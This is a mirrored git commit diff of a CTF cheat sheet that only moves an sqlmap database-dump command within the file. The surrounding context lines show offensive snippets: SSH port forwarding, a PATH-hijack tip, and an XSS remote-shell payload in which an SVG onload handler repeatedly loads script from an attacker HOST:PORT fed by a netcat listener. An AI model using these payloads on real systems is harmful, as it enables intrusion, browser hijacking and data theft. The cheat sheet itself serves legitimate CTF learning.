mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-21 19:43:03 +00:00
Update Cheat Sheet.md
This commit is contained in:
parent
58c95f9c6e
commit
6f6075a3f0
1 changed files with 3 additions and 3 deletions
|
@ -107,9 +107,6 @@ $ kill %1
|
|||
### SSH Port Forwarding
|
||||
`ssh -L <port_that_is_blockd_>:localhost:<map_blocked_port> <username>@<ip>`
|
||||
|
||||
### SQL Map
|
||||
`sqlmap -r request.txt --dbms=mysql --dump`
|
||||
|
||||
### Binary Exploits
|
||||
|
||||
If there is a certain command running in a binary example `date` so we can create our own binary and add `/bin/bash` to and path so it gets executed<br/>
|
||||
|
@ -190,6 +187,9 @@ Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; do
|
|||
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
|
||||
```
|
||||
|
||||
### SQL Map
|
||||
`sqlmap -r request.txt --dbms=mysql --dump`
|
||||
|
||||
### Wfuzz
|
||||
|
||||
`wfuzz -c -z file,wordlist.txt --hh=0 http://<ip>/<path>/?date=FUZZ`
|
||||
|
|
Loading…
Reference in a new issue